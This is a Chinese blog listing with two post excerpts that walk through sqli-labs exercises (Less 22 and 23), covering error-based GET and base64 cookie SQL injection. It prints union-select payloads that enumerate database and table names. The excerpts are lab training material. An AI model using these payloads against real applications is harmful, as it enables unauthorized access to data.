2020年2月14日
Less(23)GET - Error based - strip comments (基于错误的,过滤注释的GET型)
摘要: 1.这个没有登录框,我们先看一下php文件 看到替换了能用的注释符,所以我们构造闭合语句 2.爆破 (1)爆库:?id=' union select 1,2,database() ' (2)爆表:?id=' union select 1,2,group_concat(table_name) from 阅读全文
posted @ 2020-02-14 12:30 孟雨 阅读(229) 评论(0) 推荐(0) 编辑
Less(22)Cookie Injection- Error Based- Double Quotes - string (基于错误的双引号字符型Cookie注入)
摘要: 1.base64编码,双引号,报错型,cookie型注入 (1)和Less(21)一样,只需要使用双引号再去掉括号 2.爆破 (1)爆库:-admin" union select 1,2,database() # LWFkbWluIiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXN 阅读全文
posted @ 2020-02-14 10:57 孟雨 阅读(165) 评论(0) 推荐(0) 编辑